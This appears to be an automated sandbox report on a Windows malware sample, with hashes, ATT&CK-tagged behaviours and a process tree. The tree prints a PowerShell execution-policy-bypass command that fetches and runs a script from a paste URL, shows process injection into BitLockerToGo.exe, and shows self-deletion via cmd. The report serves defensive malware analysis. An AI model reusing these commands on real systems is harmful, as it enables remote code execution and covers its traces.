Analysis
-
max time kernel
92s -
max time network
95s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
16-08-2024 22:50
Static task
static1
Behavioral task
behavioral1
Sample
88fc2f8eb9c8bcd55aac25400b1ade16ca86b67ac26dcfbbc48fe0dddec0596c.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral2
Sample
88fc2f8eb9c8bcd55aac25400b1ade16ca86b67ac26dcfbbc48fe0dddec0596c.exe
Resource
win11-20240802-en
General
-
Target
88fc2f8eb9c8bcd55aac25400b1ade16ca86b67ac26dcfbbc48fe0dddec0596c.exe
-
Size
4.7MB
-
MD5
3ed2333986c7d9012d1c7f8a7cfad93b
-
SHA1
92d6b57a189b8b3bb5901276ecf4b7acd0b15d49
-
SHA256
88fc2f8eb9c8bcd55aac25400b1ade16ca86b67ac26dcfbbc48fe0dddec0596c
-
SHA512
6351f752ed3e7dcf5f1e2e51e732077bae46ab2b66f8941b68559523f45b05a1e5dc467b832f1294c333e56f892abf23fdce37b38e579fd7da47f733ecad0b76
-
SSDEEP
49152:qJkvJrYhZdQ6wxU7egfzI6RvCX9Y4ajiBvpt6EbmDHVEwDne4jt5E9kh33GTPA3K:bih0o5K94itNOxnE9khcI3Fk
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 2 892 powershell.exe 4 892 powershell.exe 5 892 powershell.exe -
pid Process 892 powershell.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1116 set thread context of 2276 1116 88fc2f8eb9c8bcd55aac25400b1ade16ca86b67ac26dcfbbc48fe0dddec0596c.exe 83 -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language whoami.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 892 powershell.exe 892 powershell.exe 892 powershell.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
description pid Process Token: SeDebugPrivilege 892 powershell.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe Token: SeDebugPrivilege 4224 whoami.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 1116 wrote to memory of 2276 1116 88fc2f8eb9c8bcd55aac25400b1ade16ca86b67ac26dcfbbc48fe0dddec0596c.exe 83 PID 1116 wrote to memory of 2276 1116 88fc2f8eb9c8bcd55aac25400b1ade16ca86b67ac26dcfbbc48fe0dddec0596c.exe 83 PID 1116 wrote to memory of 2276 1116 88fc2f8eb9c8bcd55aac25400b1ade16ca86b67ac26dcfbbc48fe0dddec0596c.exe 83 PID 1116 wrote to memory of 2276 1116 88fc2f8eb9c8bcd55aac25400b1ade16ca86b67ac26dcfbbc48fe0dddec0596c.exe 83 PID 1116 wrote to memory of 2276 1116 88fc2f8eb9c8bcd55aac25400b1ade16ca86b67ac26dcfbbc48fe0dddec0596c.exe 83 PID 2276 wrote to memory of 892 2276 BitLockerToGo.exe 84 PID 2276 wrote to memory of 892 2276 BitLockerToGo.exe 84 PID 2276 wrote to memory of 892 2276 BitLockerToGo.exe 84 PID 2276 wrote to memory of 4540 2276 BitLockerToGo.exe 86 PID 2276 wrote to memory of 4540 2276 BitLockerToGo.exe 86 PID 2276 wrote to memory of 4540 2276 BitLockerToGo.exe 86 PID 892 wrote to memory of 4224 892 powershell.exe 89 PID 892 wrote to memory of 4224 892 powershell.exe 89 PID 892 wrote to memory of 4224 892 powershell.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\88fc2f8eb9c8bcd55aac25400b1ade16ca86b67ac26dcfbbc48fe0dddec0596c.exe"C:\Users\Admin\AppData\Local\Temp\88fc2f8eb9c8bcd55aac25400b1ade16ca86b67ac26dcfbbc48fe0dddec0596c.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://pst.innomi.net/paste/3x38v3phae6o5fkexuwrvtfk/raw" ) ) )3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups /fo csv4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4224
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"3⤵
- System Location Discovery: System Language Discovery
PID:4540
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82